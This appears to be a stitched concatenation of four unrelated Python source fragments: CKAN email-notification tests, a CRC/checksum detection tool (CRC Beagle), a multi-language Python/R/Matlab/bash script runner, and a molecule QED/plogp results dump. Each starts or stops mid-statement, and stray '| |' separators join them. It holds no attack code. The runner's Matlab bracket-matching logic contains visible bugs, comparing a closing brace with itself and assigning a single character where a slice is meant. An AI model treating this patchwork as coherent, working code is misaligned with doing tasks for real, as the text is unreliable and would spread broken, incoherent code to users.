            apikey=self.testsysadmin["apikey"],
        )
        assert len(mail_server.get_smtp_messages()) == 1
        email = mail_server.get_smtp_messages()[0]
        self.check_email(
            email,
            "<EMAIL>",
            "<NAME>",
            "1 new activity from CKAN",
        )

        # def test_03_multiple_new_activities(self):
        """Test that a user with multiple new activities gets just one email.
        """
        # Make someone else update the dataset Sara's following three times,
        # this should create three new activities on Sara's dashboard.
        for i in range(1, 4):
            tests.call_action_api(
                self.app,
                "package_update",
                apikey=self.joeadmin["apikey"],
                name="warandpeace",
                notes="updated {0} times".format(i),
            )
        # Run the email notifier job, it should send one notification email
        # to Sara.
        mail_server.clear_smtp_messages()
        tests.call_action_api(
            self.app,
            "send_email_notifications",
            apikey=self.testsysadmin["apikey"],
        )
        assert len(mail_server.get_smtp_messages()) == 1
        email = mail_server.get_smtp_messages()[0]
        self.check_email(
            email,
            "<EMAIL>",
            "<NAME>",
            "3 new activities from CKAN",
        )
        mail_server.clear_smtp_messages()

        # def test_04_no_repeat_email_notifications(self):
        """Test that a user does not get a second email notification for the
        same new activity.
        """
        # TODO: Assert that Sara has some new activities and has already had
        # an email about them.
        tests.call_action_api(
            self.app,
            "send_email_notifications",
            apikey=self.testsysadmin["apikey"],
        )
        assert len(mail_server.get_smtp_messages()) == 0

        # def test_05_no_email_if_seen_on_dashboard(self):
        """Test that emails are not sent for activities already seen on dash.
        If a user gets some new activities in her dashboard activity stream,
        then views her dashboard activity stream, then she should not got any
        email notifications about these new activities.
        """
        # Make someone else update the dataset Sara's following, this should
        # create a new activity on Sara's dashboard.
        tests.call_action_api(
            self.app,
            "package_update",
            apikey=self.joeadmin["apikey"],
            name="warandpeace",
            notes="updated by test_05_no_email_if_seen_on_dashboard",
        )
        # At this point Sara should have a new activity on her dashboard.
        num_new_activities = tests.call_action_api(
            self.app,
            "dashboard_new_activities_count",
            apikey=self.sara["apikey"],
        )
        assert num_new_activities > 0, num_new_activities
        # View Sara's dashboard.
        tests.call_action_api(
            self.app,
            "dashboard_mark_activities_old",
            apikey=self.sara["apikey"],
        )
        # No email should be sent.
        tests.call_action_api(
            self.app,
            "send_email_notifications",
            apikey=self.testsysadmin["apikey"],
        )
        assert len(mail_server.get_smtp_messages()) == 0

        # def test_05_no_email_notifications_when_disabled_site_wide(self):
        """Users should not get email notifications when the feature is
        disabled site-wide by a sysadmin."""

        # def test_06_enable_email_notifications_sitewide(self):
        """When a sysadamin enables email notifications site wide, users
        should not get emails for new activities from before email
        notifications were enabled.
        """
# It's just easier to separate these tests into their own test class.
class TestEmailNotificationsUserPreference(ControllerTestCase):
    """Tests for the email notifications (on/off) user preference.

    NOTE(review): as in TestEmailNotifications, the ``def test_01..03``
    headers below are commented out, so their bodies run sequentially inside
    ``test_00_email_notifications_disabled_by_default`` and rely on the
    state built up by the earlier stages.
    """

    @classmethod
    def setup_class(cls):
        # Clean DB + standard fixtures.  Sara is created *without* the
        # activity_streams_email_notifications preference enabled.
        model.repo.rebuild_db()
        tests.CreateTestData.create()
        cls.app = helpers._get_test_app()
        joeadmin = model.User.get("joeadmin")
        cls.joeadmin = {"id": joeadmin.id, "apikey": joeadmin.apikey}
        testsysadmin = model.User.get("testsysadmin")
        cls.testsysadmin = {
            "id": testsysadmin.id,
            "apikey": testsysadmin.apikey,
        }
        cls.sara = tests.call_action_api(
            cls.app,
            "user_create",
            apikey=cls.testsysadmin["apikey"],
            name="sara",
            email="<EMAIL>",
            password="<PASSWORD>",
            fullname="<NAME>",
        )

    def test_00_email_notifications_disabled_by_default(self, mail_server):
        """Email notifications should be disabled for new users."""
        assert self.sara["activity_streams_email_notifications"] is False
        assert (
            tests.call_action_api(
                self.app, "user_show", apikey=self.sara["apikey"], id="sara"
            )["activity_streams_email_notifications"]
            is False
        )

        # def test_01_no_email_notifications_when_disabled(self):
        """Users with email notifications turned off should not get emails."""
        # First make Sara follow something so she gets some new activity in
        # her dashboard activity stream.
        tests.call_action_api(
            self.app,
            "follow_dataset",
            apikey=self.sara["apikey"],
            id="warandpeace",
        )
        # Now make someone else update the dataset so Sara gets a new activity.
        tests.call_action_api(
            self.app,
            "package_update",
            apikey=self.joeadmin["apikey"],
            id="warandpeace",
            notes="updated",
        )
        # Test that Sara has a new activity, just to make sure.
        assert (
            tests.call_action_api(
                self.app,
                "dashboard_new_activities_count",
                apikey=self.sara["apikey"],
            )
            > 0
        )
        # No email notifications should be sent to Sara.
        tests.call_action_api(
            self.app,
            "send_email_notifications",
            apikey=self.testsysadmin["apikey"],
        )
        assert len(mail_server.get_smtp_messages()) == 0

        # def test_02_enable_email_notifications(self):
        """Users should be able to turn email notifications on."""
        # Mark all Sara's new activities as old, just to get a fresh start.
        tests.call_action_api(
            self.app,
            "dashboard_mark_activities_old",
            apikey=self.sara["apikey"],
        )
        assert (
            tests.call_action_api(
                self.app,
                "dashboard_new_activities_count",
                apikey=self.sara["apikey"],
            )
            == 0
        )
        # Update the followed dataset a few times so Sara gets a few new
        # activities.
        for i in range(1, 4):
            tests.call_action_api(
                self.app,
                "package_update",
                apikey=self.joeadmin["apikey"],
                id="warandpeace",
                notes="updated {0} times".format(i),
            )
        # Now Sara should have new activities.
        assert (
            tests.call_action_api(
                self.app,
                "dashboard_new_activities_count",
                apikey=self.sara["apikey"],
            )
            == 3
        )
        # Run the email notifier job.
        tests.call_action_api(
            self.app,
            "send_email_notifications",
            apikey=self.testsysadmin["apikey"],
        )
        assert len(mail_server.get_smtp_messages()) == 0
        # Enable email notifications for Sara.
        self.sara["activity_streams_email_notifications"] = True
        tests.call_action_api(self.app, "user_update", **self.sara)
        tests.call_action_api(
            self.app,
            "send_email_notifications",
            apikey=self.testsysadmin["apikey"],
        )
        assert len(mail_server.get_smtp_messages()) == 0, (
            "After a user enables "
            "email notifications she should _not_ get emails about activities "
            "that happened before she enabled them, even if those activities "
            "are still marked as 'new' on her dashboard."
        )
        # Update the package to generate another new activity.
        tests.call_action_api(
            self.app,
            "package_update",
            apikey=self.joeadmin["apikey"],
            id="warandpeace",
            notes="updated yet again",
        )
        # Check that Sara has a new activity.
        assert (
            tests.call_action_api(
                self.app,
                "dashboard_new_activities_count",
                apikey=self.sara["apikey"],
            )
            == 4
        )
        # Run the email notifier job, this time Sara should get one email.
        tests.call_action_api(
            self.app,
            "send_email_notifications",
            apikey=self.testsysadmin["apikey"],
        )
        assert len(mail_server.get_smtp_messages()) == 1
        mail_server.clear_smtp_messages()

        # def test_03_disable_email_notifications(self):
        """Users should be able to turn email notifications off."""
        self.sara["activity_streams_email_notifications"] = False
        tests.call_action_api(self.app, "user_update", **self.sara)
        tests.call_action_api(
            self.app,
            "package_update",
            apikey=self.joeadmin["apikey"],
            id="warandpeace",
            notes="updated yet again",
        )
        assert (
            tests.call_action_api(
                self.app,
                "dashboard_new_activities_count",
                apikey=self.sara["apikey"],
            )
            > 0
        )
        tests.call_action_api(
            self.app,
            "send_email_notifications",
            apikey=self.testsysadmin["apikey"],
        )
        assert len(mail_server.get_smtp_messages()) == 0
class TestEmailNotificationsIniSetting(object):
    """Tests for the ckan.activity_streams_email_notifications config setting.

    NOTE(review): test_01 depends on test_00 having run first (it checks
    that test_00 sent no mail), so these tests are order-dependent.
    """

    @classmethod
    def setup_class(cls):
        # Disable the email notifications feature.
        cls.app = helpers._get_test_app()
        model.repo.rebuild_db()
        tests.CreateTestData.create()
        joeadmin = model.User.get("joeadmin")
        cls.joeadmin = {"id": joeadmin.id, "apikey": joeadmin.apikey}
        testsysadmin = model.User.get("testsysadmin")
        cls.testsysadmin = {
            "id": testsysadmin.id,
            "apikey": testsysadmin.apikey,
        }

    @pytest.mark.ckan_config("ckan.activity_streams_email_notifications", False)
    def test_00_send_email_notifications_feature_disabled(self, mail_server):
        """Send_email_notifications API should error when feature disabled."""
        # Register a new user.
        sara = tests.call_action_api(
            self.app,
            "user_create",
            apikey=self.testsysadmin["apikey"],
            name="sara",
            email="<EMAIL>",
            password="<PASSWORD>",
            fullname="<NAME>",
        )
        # Save the user for later tests to use.
        TestEmailNotificationsIniSetting.sara = sara
        # Enable the new user's email notifications preference.
        sara["activity_streams_email_notifications"] = True
        tests.call_action_api(self.app, "user_update", **sara)
        assert (
            tests.call_action_api(
                self.app, "user_show", apikey=self.sara["apikey"], id="sara"
            )["activity_streams_email_notifications"]
            is True
        )
        # Make Sara follow something so she gets some new activity in her
        # dashboard activity stream.
        tests.call_action_api(
            self.app,
            "follow_dataset",
            apikey=self.sara["apikey"],
            id="warandpeace",
        )
        # Now make someone else update the dataset so Sara gets a new activity.
        tests.call_action_api(
            self.app,
            "package_update",
            apikey=self.joeadmin["apikey"],
            id="warandpeace",
            notes="updated",
        )
        # Test that Sara has a new activity, just to make sure.
        assert (
            tests.call_action_api(
                self.app,
                "dashboard_new_activities_count",
                apikey=self.sara["apikey"],
            )
            > 0
        )
        # We expect an error when trying to call the send_email_notifications
        # API, because the feature is disabled by the ini file setting.
        tests.call_action_api(
            self.app,
            "send_email_notifications",
            apikey=self.testsysadmin["apikey"],
            status=409,
        )

    @pytest.mark.ckan_config("ckan.activity_streams_email_notifications", False)
    def test_01_no_emails_sent_if_turned_off(self, mail_server):
        """No emails should be sent if the feature is disabled site-wide."""
        # No emails should have been sent by the last test.
        assert len(mail_server.get_smtp_messages()) == 0
class TestEmailNotificationsSinceIniSetting(ControllerTestCase):
"""Tests | |
# crcbeagle/crcbeagle.py
#
# CRC Beagle, automatic CRC/Checksum detection for communication protocols.
#
# Copyright (C) <NAME>, 2021.
#
# See https://github.com/colinoflynn/crcbeagle for more details.
#
# See LICENSE file for distribution requirements.
#
# CRC differential technique based on Gregory Ewing
# https://www.cosc.canterbury.ac.nz/greg.ewing/essays/CRC-Reverse-Engineering.html
#
import logging
import struct
from crccheck.crc import Crc8Base, Crc16Base, Crc32Base, ALLCRCCLASSES
class CRCBeagle(object):
"""
CRCBeagle searches for matching CRC parameters based on several passed messages.
It uses the CRC differential technique described by Gregory Ewing, which avoids
needing to fully understand the actual CRC input settings, which is very useful
when reverse engineering communications protocols.
The basic usage is simply to pass 2 to 4 example messages & CRC pairs:
```
crcb = crcbeagle.CRCBeagle()
crcb.search(
[[165, 16, 2, 7, 85, 163, 209, 114, 21, 131, 143, 144, 52, 187, 183, 142, 180, 39, 169, 76],
[165, 16, 2, 7, 140, 39, 242, 202, 181, 209, 220, 248, 156, 112, 66, 128, 236, 187, 35, 176],
[165, 16, 2, 7, 113, 105, 30, 118, 164, 96, 43, 198, 84, 170, 123, 76, 107, 225, 133, 194]],
[[253, 14],
[90, 38],
[248, 236]])
```
"""
def crcdict_to_packstr(self, crcdict):
    """
    Return the `struct` pack/unpack format string implied by the 'crclen'
    and 'order' fields of `crcdict`.

    Raises ValueError for unsupported CRC lengths or an unknown byte order.
    """
    size = crcdict['crclen']
    if size == 1:
        # Single byte -- endianness is irrelevant.
        return "B"
    if size not in (2, 4):
        raise ValueError("Invalid crclen: %d" % size)
    order = crcdict["order"]
    if order == "le":
        prefix = "<"
    elif order == "be":
        prefix = ">"
    else:
        raise ValueError("Invalid 'order': " + order)
    return prefix + ("H" if size == 2 else "I")
def str_crc_example(self, crcdict, message=None):
    """
    Build example source code (as a string) that computes this CRC with the
    `crccheck` library.

    Optional `message` should be a list or bytearray; when given, a short
    demonstration that feeds it to the generated crc function is appended.
    """
    crclen = crcdict['crclen']
    packstr = self.crcdict_to_packstr(crcdict)
    # Pick the crccheck base class matching the CRC width.
    width = {1: "8", 2: "16"}.get(crclen, "32")
    parts = [
        "import struct\n",
        "from crccheck.crc import Crc%sBase\ncrc = Crc%sBase\n" % (width, width),
        "def my_crc(message):\n",
        " crc._poly = 0x%X\n" % crcdict['poly'],
        " crc._reflect_input = %r\n" % crcdict['reflectin'],
        " crc._reflect_output = %r\n" % crcdict['reflectout'],
        " crc._initvalue = 0x%0X\n" % crcdict['init'],
        " crc._xor_output = 0x%0X\n" % crcdict['xor_output'],
        " output_int = crc.calc(message)\n",
        ' output_bytes = struct.pack("%s", output_int)\n' % packstr,
        " output_list = list(output_bytes)\n",
        " return (output_int, output_bytes, output_list)\n",
    ]
    if message:
        parts.append("\n")
        parts.append("m = %r\n" % message)
        parts.append("output = my_crc(m)\n")
        parts.append("print(hex(output[0]))")
    return "".join(parts)
def print_crc_example(self, crcdict, message=None):
    """
    Print example `crccheck`-based code for the CRC parameters to stdout.

    Optional `message` should be a list or bytearray that is appended to
    the example as a demonstration input (normally one of the input
    messages).
    """
    example = self.str_crc_example(crcdict, message)
    print(example)
def validate_inputs(self, messages, crcs):
    """
    Sanity check the input message/CRC pairs and record their shape.

    Side effects: sets `self.message_size_dict` (payload length -> count and
    message indexes) and `self.crclen` (CRC size in bytes), and prints a
    summary of the inputs.

    Raises:
        ValueError: message/crc counts differ, CRC lengths are inconsistent,
            no CRCs were supplied, or the CRC width is not 8/16/32 bits.
        TypeError: a CRC was passed as a bare int instead of a byte list.
    """
    if len(messages) != len(crcs):
        raise ValueError("Length of message & crc arrays don't match: %d, %d" % (len(messages), len(crcs)))
    logging.info("Got %d input message-crc pairs" % len(messages))
    # Group message indexes by payload size.
    message_size_dict = {}
    for i, m in enumerate(messages):
        l = len(m)
        if l not in message_size_dict:
            message_size_dict[l] = {"num": 1, "indexes": [i]}
        else:
            message_size_dict[l]["num"] += 1
            message_size_dict[l]["indexes"].append(i)
    # All CRCs must be byte sequences of the same length.
    crclen = None
    for c in crcs:
        try:
            if crclen is None:
                crclen = len(c)
            elif len(c) != crclen:
                raise ValueError("Expect CRC inputs to be same array length, expected %d, found %d (%s)" % (crclen, len(c), str(c)))
        except TypeError:
            raise TypeError("CRC must be passed as byte list or bytearray, not int")
    if crclen is None:
        # Empty input would otherwise crash below on `None * 8`.
        raise ValueError("No CRC values supplied")
    if crclen not in (1, 2, 4):
        # BUG FIX: the original raised a plain string here, which is itself
        # a TypeError on Python 3 ("exceptions must derive from
        # BaseException").
        raise ValueError("Detected %d-bit CRC, not supported" % (crclen * 8))
    print("Input parameters:")
    print(" %d-bit CRC size" % (crclen * 8))
    print(" %d total messages, with:" % len(messages))
    for k in message_size_dict.keys():
        print(" %2d messages with %d byte payload" % (message_size_dict[k]["num"], k))
    self.message_size_dict = message_size_dict
    self.crclen = crclen
def search_linear(self, messages, crcs, print_examples=True):
    """
    Check whether a simple additive or XOR checksum explains the 8-bit
    'crc' byte, to catch devices that implemented a plain checksum rather
    than a real CRC.  Returns True when a matching linear code is found
    for all inputs, False otherwise.
    """
    if self.crclen != 1:
        logging.info("16-bit or 32-bit CRC, skipping linear code check")
        return False
    logging.info("Checking for linear code")
    # Try the additive checksum first, then the XOR checksum.
    for label, op in (("sum", "+"), ("xorsum", "^")):
        # Residue between the computed checksum and the observed byte; a
        # constant residue across every message means the code matches.
        residues = []
        for msg, crc in zip(messages, crcs):
            acc = 0
            for byte in msg:
                acc = (acc + byte) if op == "+" else (acc ^ byte)
            residues.append((acc & 0xff) ^ crc[0])
        if len(set(residues)) == 1:
            print("\nPossible linear code and not CRC: %s(m) XOR 0x%02X" % (label, residues[0]))
            print("This solution works on all %d inputs!" % len(messages))
            if print_examples:
                print("********** example usage *************")
                print("def my_checksum(message):")
                print(" checksum = 0")
                print(" for d in message:")
                print(" checksum %s= d" % op)
                print(" checksum = (checksum & 0xff) ^ 0x%02x" % residues[0])
                print(" return checksum")
                print("**************************************")
            return True
    return False
def search(self, messages, crcs, print_examples=True):
"""
Uses input `messages`-`crcs` pairs to find potential crc parameters.
Normally the crc would just be the ending bytes of the message. The crc size
is detected based on number of bytes for each crc. The crc endianness will be
auto detected, so pass the crc in the same manner as used in your communication
protocol.
"""
self.validate_inputs(messages, crcs)
message_size_dict = self.message_size_dict
if len(message_size_dict.keys()) == 1:
print("NOTE: Output parameters may be specific to this message size only. Pass different length messages if possible.")
self.search_linear(messages, crcs, print_examples)
candidates = []
## Searching
for message_len in message_size_dict.keys():
print("\nWorking on messages of %d length: "%(message_len))
if message_size_dict[message_len]["num"] > 1:
#Need at least two messages of this length to do difference...
diffsets = []
for i, idx in enumerate(message_size_dict[message_len]["indexes"]):
try:
msg1idx = message_size_dict[message_len]["indexes"][i+0]
msg2idx = message_size_dict[message_len]["indexes"][i+1]
logging.info("Using diff between message %d & %d"%(msg1idx, msg2idx))
diff = [messages[msg1idx][i] ^ messages[msg2idx][i] for i in range(0, len(messages[msg1idx]))]
diffcrc = [crcs[msg1idx][i] ^ crcs[msg2idx][i] for i in range(0, len(crcs[msg1idx]))]
for d in ALLCRCCLASSES:
if d._width == self.crclen * 8:
logging.debug("Trying class: %r"%d)
res = d.calc(messages[msg1idx])
# We'll figure out actual XOR output later
d._xor_output = 0
d._initvalue = 0 # This will get packed into _xor_output
# at some point should be smarter about it, and set
# init value to 'real' one to see if that is case.
res = d.calc(diff)
#Deal with unknown CRC order, kinda hacky but YOLO
if self.crclen == 1:
if diffcrc[0] == res:
candidates.append({"class":d, "order":"le"})
packstr = "B"
if self.crclen == 2 or self.crclen == 4:
if self.crclen == 2:
packstr = "H"
else:
packstr = "I"
testcrc = list(struct.pack("<"+packstr, res)) #LE
if list(diffcrc) == testcrc:
candidates.append({"class":d, "order":"le"})
testcrc = list(struct.pack(">"+packstr, res)) #BE
if list(diffcrc) == testcrc:
candidates.append({"class":d, "order":"be"})
cset = set()
for c in candidates:
#Convert to string to make validating in set easier, will convert back later
newc = "poly:"+hex(c["class"]._poly)+" reflectin:"+str(c["class"]._reflect_input) +\
" reflectout:"+str(c["class"]._reflect_output)+" init:"+hex(c["class"]._initvalue) +\
" order:"+c["order"] + " crclen:"+str(self.crclen)
cset.add(newc)
if len(cset) == 0:
logging.warning("No parameters for difference messages %d to %d"%(msg1idx, msg2idx))
else:
logging.info("Parameters for difference messages: %s"%str(cset))
diffsets.append(cset)
except IndexError as e:
#TODO - overextends itself and uses | |
= not _ignore
elif not _ignore and _l[_i] in '#%':
# if we're not in a string and it's a comment
break # stop before here
_i += 1
_l = _l[:_i]
# get the code to run
# have to bundle for subprocess.run
_to_exec = [_l] if _l and _l[0] not in '%#' else []
while _l and _l[:2] not in ['#!','%!'] and _end < len(_lines)-1:
_end += 1
_l = _lines[_end]
if _l and _l[0] not in '%#':
# ignore comments
_i = 0
_ignore = False
while _i < len(_l):
if _l[_i] in '\'"':
_ignore = not _ignore
elif not _ignore and (_l[_i] in '#%'):
break
_i += 1
_to_exec.append(_l[:_i])
# run in terminal
# raises error if return code not 0
if _verbosity == 0: subprocess.run('\n'.join(_to_exec), shell=True, env={k:str(v) for k,v in _environ.items()}, executable='/bin/bash', stdout=open('/dev/null', 'w')).check_returncode()
else: subprocess.run('\n'.join(_to_exec), shell=True, env={k:str(v) for k,v in _environ.items()}, executable='/bin/bash').check_returncode()
# update and move on
_environ = os.environ.copy()
_counter = _end+1 if _end == len(_lines)-1 else _end
continue
# if currently in R
elif _lang == 'r':
if _current_line[:2] in ['#!','%!']: # switching environments
if 'p' in _current_line.lower().split('->')[0]: # if switching to Python
if _verbosity >= 2: print('Switching to Python')
_lang = 'p'
r_to_py(_current_line, _r_object)
elif 'm' in _current_line.lower().split('->')[0]: # if switching to Matlab
if _verbosity >= 2: print('Switching to Matlab')
_lang = 'm'
_mat_object = r_to_mat(_current_line, _r_object, _mat_object)
elif 'b' in _current_line.lower().split('->')[0]: # if switching to bash
if _verbosity >= 2: print('Switching to bash')
_lang = 'b'
_environ = r_to_bash(_line, _environ)
_counter += 1
continue
else: # otherwise do the thing
# go through the code
_end = _counter
while _end < len(_lines) and _lines[_end].strip()[:2] not in ['#!', '%!']:
_l = _lines[_end].strip()
if _l and _l[0] not in '#%':
# remove comments
_i = 0
_ignore = False
while _i < len(_l):
if _l[_i] in '\'"':
_ignore = not _ignore
elif not _ignore and (
_l[_i] == '#' or (
_l[_i] == '%' and
# have to ignore all the %...% operators
not any([('%' + j + '%') in _l[_i:_i+10] for j in
['in','between', 'chin', '+', '+replace',':','do','dopar',
'>','<>','T>','/', '*','o','x','*']
])
)
):
break
_i += 1
# do the thing
_r_object.sendline(_l[:_i])
if _verbosity > 0 and len(_r_object.before.split(_l[:_i])) > 1:
_temp = _r_object.before.split(_l[:_i])[1].strip()
if _temp: print(_temp)
_end += 1
# move on
_counter = _end
continue
# if currently in Matlab
elif _lang == 'm':
if _current_line[:2] == '#!': # switching environments
if 'p' in _current_line.lower().split('->')[0]:
if _verbosity >= 2: print('Switching to Python')
_lang = 'p'
mat_to_py(_current_line, _mat_object)
elif 'r' in _current_line.lower().split('->')[0]:
if _verbosity >= 2: print('Switching to R')
_lang = 'r'
_r_object = mat_to_r(_current_line, _mat_object, _r_object)
elif 'b' in _current_line.lower().split('->')[0]:
if _verbosity >= 2: print('Switching to bash')
_lang = 'b'
_environ = mat_to_bash(_line, _environ)
_counter += 1
continue
else: # otherwise do the thing
# go through the code
_end = _counter
_done = ''
while _end < len(_lines) and _lines[_end].strip()[:2] not in ['#!', '%!']:
_l = _lines[_end].strip()
if _l and _l[0] not in '%#':
# skip comments
_i = 0
_ignore = False
while _i < len(_l):
if _l[_i] in '\'"':
_ignore = not _ignore
elif not _ignore and (_l[_i] in '#%'):
break
_i += 1
# do the thing
# if command doesn't finish, matlab doesn't send anything in return
_mat_object.send(_l[:_i] + '\n')
_mat_object.expect('\r\n')
if _l[-3:] == '...':
# if end with line continuation, nothing
continue
# look for balancing things to see if done
for i in _l:
if i in '([{':
_done += i
elif i in ')]}':
try:
if i == ')' and _done[-1] == '(':
_done = _done[:-1]
elif i == ']' and _done[-1] == '[':
_done = _done[:-1]
elif i == '}' and _done[-1] == '}':
_done = _done[-1]
except Exception:
pass
if len(_done) == 0:
# if everything matches up, start over
_mat_object.expect('>>')
if _verbosity >= 1 and _mat_object.before != '':
# print if we're printing
print(_mat_object.before)
_end += 1
# move on
_counter = _end
continue
else: # shouldn't get here ever
raise ValueError('Invalid definition of _lang, contact <EMAIL>.')
# return
ret = Master(r_object = _r_object, mat_object = _mat_object, environ = _environ)
ret.load_from_dict(_VARIABLES)
return ret
# -------------------------------- Main Classes -------------------------------- #
class Master:
"""An interactive Multilang environment
Allows for interfacing with R, Matlab, and bash environments.
Relies on RObject and MatlabObject classes, and `subprocess.run`.
Unlike in scripts, do not pass misformatted comments.
R/bash - # only
Matlab - % or '%{...%}' only
The Python environment here is only a dictionary to load/store variables.
All Python code is expected to be run directly by the user.
Properties
----------
who
Returns {'X': who_X} for all X
who_X
Returns a list of the names of all variables in the X environment
r_object
The underlying R environment
isalive_r
If the underlying R environment is alive
mat_object, m_object, matlab_object
The underlying Matlab environment
isalive_mat, isalive_m, isalive_matlab
If the underlying Matlab environment is alive
bash_object
The dict of variables underlying the bash environment
Functions
---------
connect
Connect to the underlying environments
reconnect
Reconnect to the underlying environments
dump_all
Return all variables from all environments
load, load_to_py, to_py
Add variable to the Python variable dictionary
load_from_dict
Add variables to the Python variable dictionary
drop
Drop variable(s) from the Python variable dictionary
dump_py
Return the Python variable dictionary
For X in [r, bash, mat/m/matlab]:
connect_X
Connect to the underlying R environment
X
Run X code
X_to_mat, X_to_m, X_to_matlab
Move variable(s) from X to Matlab
X_to_r
Move variable(s) from X to R
dump_X
Get all variables from X
Or move all variables from X to the Python variable dictionary
X_to_py
Move variable(s) from X to the Python variable dictionary
Or get variable(s) from X
X_to_bash
Move variable(s) from R to bash
py_to_X
Move variable(s) from the Python variable dictionary to X
dump_to_X
Move all variables from the Python variable dictionary to X
"""
def __init__(self, r : bool = True, mat : bool = True, load_r : bool = False,
             r_object : RObject = None, mat_object : MatlabObject = None, environ : dict = None,
             timeout : int = 600, m : bool = True, matlab : bool = True):
    """Setup a Master object

    Parameters
    ----------
    r : bool
        Whether to connect to an R environment on startup
        Default: True
    mat : bool
        Whether to connect to a Matlab environment on startup; only
        connects if `mat`, `m` and `matlab` are all True
        Default: True
    load_r : bool
        Whether to load the existing workspace in R
        Default: False
    r_object : RObject
        An existing R environment to use
        Default: new RObject()
    mat_object : MatlabObject
        An existing Matlab environment to use
        Default: new MatlabObject()
    environ : dict[str: str,int,float]
        A dictionary to use for the bash environment
        Default: os.environ
    timeout : int
        Number of seconds until time out
        Only used if new R or Matlab environments are being generated
        Default: 600
    m : bool
        Alias of `mat` (combined with logical AND)
        Default: True
    matlab : bool
        Alias of `mat` (combined with logical AND)
        Default: True

    Returns
    -------
    Master
        Initialized object
    """
    if system() == 'Windows':
        raise NotImplementedError('Not implemented for Windows')
    ## Setup environments
    # R
    if not r_object: self._r_object = RObject(r, load_r, timeout)
    else: self._r_object = r_object
    # Matlab
    mat = mat and m and matlab
    if not mat_object: self._mat_object = MatlabObject(mat, timeout)
    else: self._mat_object = mat_object
    # bash
    if not environ: self._environ = os.environ.copy()
    else: self._environ = environ
    # Snapshot of the original environment for later restoration.
    self._orig_env = os.environ.copy()
    # Python
    self._variables = {}
@property
def who(self):
    """Returns {'mat': `who_m`, 'r': `who_r`, 'py': `who_py`, 'bash': `who_bash`}"""
    return dict(mat=self.who_m, r=self.who_r, py=self.who_py, bash=self.who_bash)
def connect(self, r : bool = True, mat : bool = True, load_r : bool = False):
    """Connect to the underlying environments.

    Does nothing if the target environment is already connected.

    Parameters
    ----------
    r : bool
        Whether to connect to the R environment
        Default: True
    mat : bool
        Whether to connect to the Matlab environment
        Default: True
    load_r : bool
        Whether to load the existing workspace in R
        Default: False
    """
    if r:
        self.connect_r(load_r)
    if mat:
        self.connect_mat()
def reconnect(self, r : bool = True, mat : bool = True, force : bool = True, load_r : bool = False):
    """Reconnect to the underlying environments.

    Parameters
    ----------
    r : bool
        Whether to reconnect to the R environment
        Default: True
    mat : bool
        Whether to reconnect to the Matlab environment
        Default: True
    force : bool
        Whether to force reconnection
        Default: True
    load_r : bool
        Whether to load the existing workspace in R
        Default: False
    """
    if r:
        self.r_object.reconnect(force, load_r)
    if mat:
        self.mat_object.reconnect(force)
def to_py(self, name : str, value):
    """Alias for `load`: store @value under @name in the Python variable dict."""
    return self.load(name, value)
def load_to_py(self, name : str, value):
    """Alias for `load`: store @value under @name in the Python variable dict."""
    return self.load(name, value)
def load(self, name : str, value):
    """Loads the given Python variable as {name: value}"""
    self._variables.update({name: value})
def drop(self, name):
    """Drop the given variable(s) from the Python environment.

    Parameters
    ----------
    name : str or iterable of str
        Variable name(s) to remove from the Python variable dictionary

    Raises
    ------
    KeyError
        If a given name is not currently loaded
    """
    if hasattr(name, '__iter__') and not isinstance(name, str):
        for i in name:
            self.drop(i)
        # bugfix: previously fell through to `del self._variables[name]`
        # with the iterable itself, raising TypeError/KeyError after the
        # individual names had already been dropped
        return
    del self._variables[name]
def load_from_dict(self, d : dict):
    """Add the given Python variables as {name: value}

    Use `load_from_dict(globals())` to load all variables
    """
    for key, val in d.items():
        self._variables[key] = val
@property
def who_py(self):
    """Returns a list of Python variables."""
    return [name for name in self._variables]
def dump_py(self):
    """Returns the Python variables as a dict of {name:value}"""
    return dict(self._variables)
def dump_all(self, precedence : str = 'all', load : bool = False):
"""Get/Load all variables from R and Matlab
Parameters
----------
precedence : None, str in ['all', 'r', 'mat']
If str: sets which environment gets precedence
If 'all': set conflicting variable names as R_name and mat_name
If None: error on conflict
Default: 'all'
load : bool
Whether to load the result into the Python variable dict
Default: False
Returns
-------
dict
{name:value} for all variables in R and Matlab
Raises
------
RuntimeError
If either the R or Matlab environment is not alive
NameError
If @precendence is None and there is a conflicting name
ValueError
If @precendence not in [None, 'r', 'mat', 'all']
"""
# can't do anything
if not self.isalive_r: raise RuntimeError('r_object not alive')
elif not self.isalive_mat: raise RuntimeError('mat_object not alive')
# get all the variables from R
names = self.who_r
random_name = ''.join(choices('abcdefghijklmnopqrstuvwxyz', k=10))
self.r_object.sendline(random_name + '<- tempfile(); ' + random_name)
temp_file = str(self.r_object.before).split('"')[1]
self.r_object.sendlines([
'writeMat(paste(' + random_name + ',".mat", sep=""), ' + ', '.join([i + '=' + | |
RuntimeError as e:
bad_plogp += 1
plogp = -999
print(i+1, Chem.MolToSmiles(mol, isomericSmiles=True), ' error in penalized_log')
results.append((qed, plogp, smile, smile2))
f.write('{},{},{},{}\n'.format(qed, plogp, smile, smile2))
f.flush()
f.close()
results.sort(key=lambda tup: tup[0], reverse=True)
fv = filename.split('.')
f = open(fv[0]+'_sortedByQED.'+fv[1], "w") # append mode
for r in results:
qed, plogp, smile, smile2 = r
f.write('{},{},{},{}\n'.format(qed, plogp, smile, smile2))
f.flush()
f.close()
results.sort(key=lambda tup: tup[1], reverse=True)
fv = filename.split('.')
f = open(fv[0] + '_sortedByPlogp.' + fv[1], "w") # append mode
for r in results:
qed, plogp, smile, smile2 = r
f.write('{},{},{},{}\n'.format(qed, plogp, smile, smile2))
f.flush()
f.close()
print('Dump done!')
print('Total: {}\t Invalid: {}\t bad_plogp: {} \t bad_qed: {}\n'.format(total, invalid, bad_plogp, bad_qed))
def test_smiles_to_tensor():
    """Debug helper: inspect SMILES round-trips under kekulization/AddHs and
    verify that equivalent SMILES spellings decode to identical tensors.

    Each MolToSmiles call carries a trailing comment with its observed output;
    note that isomericSmiles=False drops the [C@H] stereocenter.
    """
    mol_smiles = 'CC(=O)c1ccc(S(=O)(=O)N2CCCC[C@H]2C)cc1' # 'CC(C)(C)c1ccc2occ(CC(=O)Nc3ccccc3F)c2c1' # 'CCOC1=C(N)OC=C1' #'CCC1COC(C)CO1' # 'CCC1=NNN=C1CC' #'CCCC1=C(O)C=CO1' # 'CCCCC1=NC=NN1' # 'CCCNC1=COC=C1' # or 'CCCNc1ccoc1' same results for smile # 'CCCNC1=COC=C1' #'CCCNC1=CC=CO1' #'CC1=C2C(=O)N(C)C12'
    mm = Chem.MolFromSmiles(mol_smiles)
